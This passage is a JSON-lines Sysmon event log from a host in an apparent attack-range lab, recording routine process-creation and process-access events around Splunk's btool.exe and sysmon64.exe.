{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3247,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.858\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-0010375D0500}\r\nProcessId: 1524\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-0010725C0500}\r\nParentProcessId: 4568\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.858","ProcessGuid":"{41C8662E-1FF3-5F25-0000-0010375D0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-0010725C0500}","ParentProcessId":"4568","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3248,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-0010725C0500}\r\nSourceProcessId: 4568\r\nSourceThreadId: 4628\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010375D0500}\r\nTargetProcessId: 1524\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-0010725C0500}","SourceProcessId":"4568","SourceThreadId":"4628","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010375D0500}","TargetProcessId":"1524","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3249,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010375D0500}\r\nTargetProcessId: 1524\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010375D0500}","TargetProcessId":"1524","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3250,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3251,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3252,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3253,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3254,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3255,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480